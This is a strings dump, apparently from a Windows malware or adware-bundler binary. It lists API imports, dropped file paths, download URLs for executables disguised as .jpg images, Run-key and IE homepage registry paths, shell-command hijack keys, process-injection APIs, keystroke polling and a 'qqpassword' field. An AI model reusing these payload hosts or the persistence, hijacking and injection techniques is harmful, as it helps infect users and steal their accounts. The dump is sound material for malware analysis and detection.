C:\Program Files\Common Files\360
C:\Program Files\Common Files\7
C:\Program Files\Common Files\8
C:\Program Files\Common Files\-8434_48740_mny.exe
C:\Program Files\Common Files\-8434_48740_mvy.exe
C:\Program Files\Common Files\acbbb.exe
C:\Program Files\Common Files\asdqw_3104-48740.exe
C:\Program Files\Common Files\baidu.jpg
C:\Program Files\Common Files\bdsd_1454_7654_356.exe
C:\Program Files\Common Files\bfyy_1346_7654_356.exe
C:\Program Files\Common Files\bfyy_1346_7654_356.jpg
C:\Program Files\Common Files\gswb_1454_7654_356.exe
C:\Program Files\Common Files\gswb_1454_7654_356.jpg
C:\Program Files\Common Files\jKAVSETUPS_60_306938.exe
C:\Program Files\Common Files\Microsoft Shared\2345pack.ini
C:\Program Files\Common Files\Microsoft Shared\2345.txt
C:\Program Files\Common Files\Microsoft Shared\acbbb.txt
C:\Program Files\Common Files\Microsoft Shared\meinv.txt
C:\Program Files\Common Files\Microsoft Shared\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\Microsoft Shared\pp3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\Common Files\pczh_105_48740.exe
C:\Program Files\Common Files\pptv_7654_356.exe
C:\Program Files\Common Files\pptv_7654_356.jpg
C:\Program Files\Common Files\qhse_7654_356.exe
C:\Program Files\Common Files\qhse_7654_356.jpg
C:\Program Files\Common Files\TD
C:\Program Files\Common Files\UC
C:\Program Files\Common Files\ucbrowser_7654_356.exe
C:\Program Files\Common Files\ucbrowser_7654_356.jpg
C:\Program Files\Common Files\wps_1454_7654_356.exe
C:\Program Files\Common Files\wps_1454_7654_356.jpg
C:\Program Files\Doyo\DyUninstall.exe
C:\Program Files\dudu_b_55687.exe
C:\Program Files\GSInput
C:\Program Files\GSInput\3.0.1.0512\uninst.exe
C:\Program Files\gssoft\gswb\2.8.1.1120\uninst.exe
C:\Program Files\HaoZip
C:\Program Files\HaoZip\Uninstall.exe
C:\Program Files\iQIYI\QiyiInstaller.exe
C:\Program Files\JJ
C:\Program Files\kingsoft\kingsoft antivirus\uni0nst.exe
C:\Program Files\liebao\liebao.exe
C:\Program Files\p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
C:\Program Files\PPStream\unpps.exe
C:\Program Files\SogouExplorer\SogouExplorer.exe
C:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
C:\Program Files\UCBrowser\UCBrowser.exe
C:\Program Files\UCBrowser\UCBrowser.exe --wow-launch-from=desktop
C:\Program Files\UCBrowser\Uninstall.exe
C:\Program Files\yyfm0529\201407051412\Unins.exe
CreateBitmap
CreateCompatibleDC
CreateDialogIndirectParamA
CreateDIBSection
CreateDirectoryA
CreateEventA
CreateFileA
CreateMenu
CreateMutexW
CreatePatternBrush
CreatePopupMenu
CreateProcessA
CreateRoundRectRgn
CreateShortcut
CreateSolidBrush
CreateThread
CreateToolhelp32Snapshot
CreateWaitableTimerA
CreateWindowExA
CResourceException
- CRT not initialized
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
CTempDC
CTempGdiObject
CTempMenu
CTempWnd
C:\user\Administrator\Local Settings\Application Data\Kingsoft\WPS Office
C:\user\All Users\
CUserException
C:\users\administrator\
C:\users\Administrator\
C:\users\Administrator\Application Data\360se6\Application\360se.exe
C:\users\Administrator\Application Data\360se6\Application\6.3.1.153\installer\setup.exe
C:\Users\Administrator\Desktop\
C:\users\Administrator\Local Settings\Application Data\Kingsoft\WPS Office\9.1.0.4463\utility\uninst.exe
C:\users\Administrator\Local Settings\Temp\bluefiles
C:\users\All Users\
CWinApp
C:\WINDOWS\Media\
C:\WINDOWS\Media\dbase.mdb
C:\WINDOWS\Media\Desktop.ini
C:\WINDOWS\Media\Desktop.ini:dbase.mdb
C:\WINDOWS\Media\ok.jpg
C:\WINDOWS\system32\taskmgr.exe
C:\WINDOWS\system\360sd.txt
C:\WINDOWS\system\360se
C:\WINDOWS\system\360.txt
C:\WINDOWS\system\ADSafe
C:\Windows\system\APP
C:\Windows\system\APPP
C:\WINDOWS\system\baidusd2.txt
C:\WINDOWS\system\baiduweishi2.txt
C:\WINDOWS\system\bf.txt
C:\WINDOWS\system\guan2.txt
C:\WINDOWS\system\leibao
C:\WINDOWS\system\pczh.txt
C:\WINDOWS\system\pptv.txt
C:\WINDOWS\system\uc
C:\WINDOWS\system\uc.txt
C:\WINDOWS\system\UC.txt
C:\WINDOWS\system\wps2.txt
CWinThread
@.data
dddd, MMMM dd, yyyy
December
DecodePointer
`default constructor closure'
DefMDIChildProcA
DefWindowProcA
DefWindowProcW
 delete
 delete[]
Delete
DeleteCriticalSection
DeleteDC
DeleteFileA
DeleteObject
Desk=0
DestroyCursor
DestroyIcon
DestroyMenu
DestroyWindow
DispatchMessageA
DISPLAY
DLL ERROR
DocumentPropertiesA
DOMAIN error
D:\Program Files\Tencent\QQPCMgr\8.12.11701.227\Uninst.exe
D:\Program Files\Tencent\QQPCMgr\8.8.10756.232\Uninst.exe
DragAcceptFiles
DragFinish
DragQueryFileA
DrawMenuBar
DrawTextA
D$<SUV
D$Tj\P
D$,WPQR
D$$WPV
D$XQRP
`dynamic atexit destructor for '
`dynamic initializer for '
&Edit,0,2
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
Embedded Object
Embed Source
EnableMenuItem
EnableWindow
EncodePointer
EndDialog
EndPaint
EnterCriticalSection
EnumDisplayMonitors
EnumWindows
Escape
ExitProcess
Explorer=1
ExtCreateRegion
ExtTextOutA
F,_^][
@@f98u
f9z.vk
__fastcall
February
FileName
FileNameW
FileTimeToLocalFileTime
FileTimeToSystemTime
FillRect
FindClose
FindFirstFileA
FindFirstFileW
FindNextFileA
FindResourceA
FindWindowA
FindWindowExA
- floating point not loaded
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FlushFileBuffers
FreeEnvironmentStringsA
FreeEnvironmentStringsW
FreeLibrary
Friday
frmProgress
GAIsProcessorFeaturePresent
gdi32.dll
GDI32.dll
GetACP
GetActiveWindow
GetAsyncKeyState
GetCapture
GetClassInfoA
GetClassLongA
GetClassNameA
GetClientRect
GetClipBox
GetCommandLineA
GetCommandLineW
GetConsoleCP
GetConsoleMode
GetConsoleOutputCP
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThread
GetCurrentThreadId
GetCursorPos
GetDateFormatA
GetDesktopWindow
GetDeviceCaps
GetDlgCtrlID
GetDlgItem
GetEnvironmentStrings
GetEnvironmentStringsW
GetEnvironmentVariableA
GetFileAttributesW
GetFileSize
GetFileTime
GetFileType
GetFocus
GetFolder
GetForegroundWindow
GetFullPathNameW
GetKeyState
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetLocalTime
GetMenu
GetMenuCheckMarkDimensions
GetMenuDefaultItem
GetMenuInfo
GetMenuItemCount
GetMenuItemID
GetMenuItemInfoA
GetMenuItemRect
GetMenuState
GetMenuStringA
GetMessageA
GetMessagePos
GetMessageTime
GetModuleFileNameA
GetModuleFileNameW
GetModuleHandleA
GetMonitorInfoA
GetNextDlgTabItem
GetObjectA
GetOEMCP
GetParent
GetPrivateProfileStringW
GetProcAddress
GetProcessHeap
GetProcessVersion
GetProcessWindowStation
GetPropA
GetStartupInfoA
GetStartupInfoW
GetStdHandle
GetStockObject
GetStringTypeA
GetStringTypeW
GetSubMenu
GetSysColor
GetSysColorBrush
GetSystemDirectoryA
GetSystemMenu
GetSystemMetrics
GetSystemTimeAsFileTime
GetTempPathA
GetThreadContext
GetTickCount
GetTimeFormatA
GetTopWindow
GetUserDefaultLCID
GetUserNameA
GetUserObjectInformationA
GetVersion
GetVersionExA
GetWindow
GetWindowLongA
GetWindowPlacement
GetWindowRect
GetWindowsDirectoryA
GetWindowTextA
GetWindowTextLengthA
GetWindowThreadProcessId
GlobalAddAtomA
GlobalAlloc
GlobalDeleteAtom
GlobalFindAtomA
GlobalFlags
GlobalFree
GlobalGetAtomNameA
GlobalHandle
__GLOBAL_HEAP_SELECTED
GlobalLock
GlobalReAlloc
GlobalUnlock
Google Chrome
Google Chrome.lnk
GrayStringA
`h````
\hao123
HaoZip=1
HeapAlloc
HeapCreate
HeapDestroy
HeapFree
HeapReAlloc
HeapSize
`h`hhh
HH:mm:ss
HHtpHHtl
_Hide.exe
HideProgress=0
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
HKEY_USERS
H:mm:ss
HomePage
Host: 
HSVHWtgHHtF
htmlfile\shell\
htmlfile\shell\e\command\
http://
HTTP/1.0
HttpAddRequestHeadersA
http://d2.freep.cn/3tb_1407022208566i73534388.jpg
http://d2.freep.cn/3tb_140717230328kox0535559.jpg
http://d2.freep.cn/3tb_140717233351d31e535559.jpg
http://d2.freep.cn/3tb_140718102418ibmr535559.jpg
http://d3.freep.cn/3tb_1407022202406i73534388.jpg
http://d3.freep.cn/3tb_14071723055648l3535559.jpg
http://d3.freep.cn/3tb_1407172310353q5k535559.jpg
http://d3.freep.cn/3tb_1407172315202xdu535559.jpg
http://d3.freep.cn/3tb_140717232426px20535559.jpg
http://down.shuyeer.net/dudu/dudu_b_55687.exe
http://d.union.ijinshan.com/duba/link/jKAVSETUPS_60_306938.exe
http://jifendownload.2345.cn/jifen_2345/p3_kbaidu888888_jg04OunlF483lZatm6Ir5_v14.7.1.exe
HttpOpenRequestA
HttpQueryInfoA
HttpSendRequestA
HTTP\shell\
HTTP\shell\e\command\
https\shell\
https\shell\e\command\
http://www.12000.com.cn/-8434_48740_mny.jpg
http://www.12000.com.cn/acbbb.jpg
http://www.12000.com.cn/guanshu.jpg
http://www.12000.com.cn/td.jpg
http://www.duba.com/?un_2_445816
http://www.soso56.com/360ban.jpg
http://www.soso56.com/qq.jpg
hWj@_;
_hypot
IEFav=1
IEHome=1
InitCommonControlsEx
InitializeCriticalSection
InitializeCriticalSectionAndSpinCount
InsertMenuA
InterlockedDecrement
InterlockedIncrement
InternetCloseHandle
InternetConnectA
InternetOpenA
InternetOpenUrlA
InternetReadFile
InternetShortcut\shell\
InternetShortcut\shell\e\command\
InvalidateRect
invalid string position
IsBadCodePtr
IsBadReadPtr
IsBadWritePtr
IsDebuggerPresent
IsDialogMessageA
IsIconic
IsValidCodePage
IsWindow
IsWindowEnabled
IsWindowVisible
IsZoomed
j8j ^V
JanFebMarAprMayJunJulAugSepOctNovDec
January
j\h0BF
kernel32
KERNEL32
kernel32.dll
Kernel32.dll
KERNEL32.dll
KERNEL32.DLL
KillTimer
KuGou=1
KuWo=0
L$0_^]
L$49l$4}
\$L9|$
LCMapStringA
LCMapStringW
L$DWQV
LeaveCriticalSection
Link Source
Link Source Descriptor
LoadBitmapA
LoadCursorA
LoadIconA
LoadLibraryA
LoadMenuA
LoadResource
LoadStringA
LocalAlloc
LocalFree
LocalReAlloc
LocalSize
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
LockResource
L$$PQh
L$<RPQ
lstrcatA
lstrcmpA
lstrcmpiA
lstrcpyA
lstrcpyn
lstrcpynA
lstrlenA
lstrlenW
l$ UPVQ
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
MapWindowPoints
M/d/yy
MenuItemFromPoint
MessageBoxA
mhtmlfile\shell\
mhtmlfile\shell\e\command\
Microsoft Visual C++ Runtime Library
.mixcrt
MM/dd/yy
ModifyMenuA
Monday
MonitorFromPoint
MonitorFromRect
MonitorFromWindow
MoveFileA
MoveFileExA
MoveWindow
Movie=0
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
mscoree.dll
MsgWaitForMultipleObjects
MS Sans Serif
MS Shell Dlg
__MSVCRT_HEAP_SELECT
MulDiv
MultiByteToWideChar
n0SSSSU
Native
net user 
 new[]
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
ntdll.dll
NTDLL.DLL
NtReadVirtualMemory
(null)
Object Descriptor
ObjectLink
October
OffsetViewportOrgEx
ole32.dll
OLEAUT32.dll
oledlg.dll
OleFlushClipboard
OleInitialize
OleIsCurrentClipboard
OLEPRO32.DLL
OleRun
OleUninitialize
`omni callsig'
&Open,0,2
OpenEventA
OpenFile
OpenPrinterA
OpenProcess
operator
OwnerLink
__pascal
Path=C:\Program Files\
PathFileExistsA
PathFindFileNameA
PathIsDirectoryA
PathMatchSpecA
PathRemoveFileSpecA
.PAVCException@@
.PAVCMemoryException@@
.PAVCObject@@
.PAVCSimpleException@@
.PAVCUserException@@
PCMgr=1
PeekMessageA
Ph_^][Y
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
PostMessageA
PostQuitMessage
PostThreadMessageA
PPPPhd
PPPPPPPP
  PPTV 
\PPTV.lnk
ppxxxx
PreviewPages
Process32First
Process32Next
Program: 
program internal error number is %d. 
<program name unknown>
PtInRect
__ptr64
PtVisible
- pure virtual function call
PWVWWW
&qqpassword=  
QQPCTray.exe
QQSVWd
QQSVWh
QQSVWj
QSUVWj
QueryPerformanceCounter
RaiseException
RARCloseArchive
RAROpenArchiveEx
RARProcessFile
RARReadHeader
RARSetCallback
RARSetPassword
 rbrbrb99
`.rdata
ReadFile
ReadProcessMemory
RectVisible
RedrawWindow
REG_BINARY - 
RegCloseKey
RegCreateKeyA
RegCreateKeyExA
RegDeleteKeyA
RegDeleteValueA
REG_DWORD - DWORD
RegEnumKeyA
RegEnumValueA
RegFlushKey
RegisterClassA
RegisterClassExA
RegisterClipboardFormatA
RegisterHotKey
RegisterWindowMessageA
REG_MULTI_SZ - 
REG_NONE - 
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
REG_REG_EXPAND_SZ - 
RegSetValueExA
REG_SZ - 
ReleaseDC
RemoveDirectoryA
RemoveMenu
RemovePropA
RestoreDC
__restrict
ResumeThread
Richc+z
RichEdit Text and Objects
Rich Text Format
RPWWWj
RtlMoveMemory
RtlUnwind
runtime error 
Runtime Error!
:"%s".
Safe=0
Saturday
SaveDC
`scalar deleting destructor'
ScaleViewportExtEx
ScaleWindowExtEx
ScreenToClient
scripting.FileSystemObject
SelectObject
SendDlgItemMessageA
SendMessageA
September
SetActiveWindow
SetBkColor
SetClassLongA
SetCursor
SetErrorMode
SetFileAttributesA
SetFilePointer
SetFocus
SetForegroundWindow
SetHandleCount
SetLastError
SetLayeredWindowAttributes
SetMapMode
SetMenu
SetMenuDefaultItem
SetMenuInfo
SetMenuItemBitmaps
SetMenuItemInfoA
SetParent
SetPropA
SetRect
SetStdHandle
SetTextColor
SetThreadContext
SetTimer
Settings
SetUnhandledExceptionFilter
SetViewportExtEx
SetViewportOrgEx
SetWaitableTimer
SetWindowExtEx
SetWindowLongA
SetWindowPos
SetWindowRgn
SetWindowsHookExA
SetWindowTextA
shell32.dll
SHELL32.dll
ShellExecuteExW
Shell_NotifyIconA
Shell_TrayWnd
SHGetSpecialFolderPathA
shlwapi.dll
Shlwapi.dll
SHLWAPI.dll
ShowWindow
ShowWindowAsync
SING error
sO;>|C;~
software
SoHu=0
s[S;7|G;w
SS@SSPVSS
_SSSSU
StartAuto=1
Start Page
__stdcall
StretchBlt
`string'
string too long
Sunday
SunMonTueWedThuFriSat
SusWnd
SysPager
System
SystemParametersInfoA
t0WWWWW
t@_^]3
t8j\h0BF
t'9|$pt
t	9p$u
t^9(uZ
TabbedTextOutA
TargetPath
TaskbarCreated
taskmgr.exe
tb9} u
tD9_Pt?
tD9(u@
tehDL@
\TemporaryFile
\....\TemporaryFile
TerminateProcess
TextOutA
This application has requested the Runtime to terminate it in an unusual way.
__thiscall
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
t>Ht Ht
t+Ht$Ht
Thursday
   tiandi
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
T$LURV
ToolbarWindow32
tq9w(tlSj
tR99u2
TrackMouseEvent
TrackPopupMenu
TranslateAcceleratorA
TranslateMessage
TrayNotifyWnd
t#SSUP
+ttHHtd
t.;t$$t(
Tuesday
;t$,v-
t$$VSS
tvWWWWU
T$$WRV
t+WWVPV
 Type Descriptor'
`typeof'
`udt returning'
uL9=|+A
- unable to initialize heap
- unable to open console device
__unaligned
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UnhookWindowsHookEx
\uninst.exe
Unknown exception
unrar.dll
UnregisterClassA
UnregisterHotKey
UpdateWindow
UQPXY]Y[
uRFGHt
URPQQhl
user32
USER32
user32.dll
User32.dll
USER32.dll
USER32.DLL
User-Agent: DownJet1.0
?UUUUUU
\$(UVW
ValidateRect
`vbase destructor'
`vbtable'
VC20XC00U
`vcall'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`vftable'
VirtualAlloc
VirtualAllocEx
`virtual displacement map'
VirtualFree
VirtualFreeEx
VirtualProtectEx
VirtualQueryEx
v	N+D$
,&[vrH
VWuBhd
WaitForSingleObject
Wednesday
WideCharToMultiByte
WinExec
WinHelpA
wininet.dll
WININET.dll
WINSPOOL.DRV
woqqqainima de a
\WPS Office 
WPS_Office_7654_356.exe
(wqt\HHtS
WriteConsoleA
WriteConsoleW
WriteFile
WritePrivateProfileStringA
WriteProcessMemory
wshom.ocx
WshShell
wsprintfA
WTWindow
WwktZ=
"WWShD
xppwpp
xpxxxx
>=Yt/j
_^][YY
\yyfm0529
YYu-9D$
YYuTVWh
?yyyy-MM-dd
Z9K|uU
z>C:\WINDOWS\system\js.txt
ZwQueryInformationProcess
ZwUnmapViewOfSection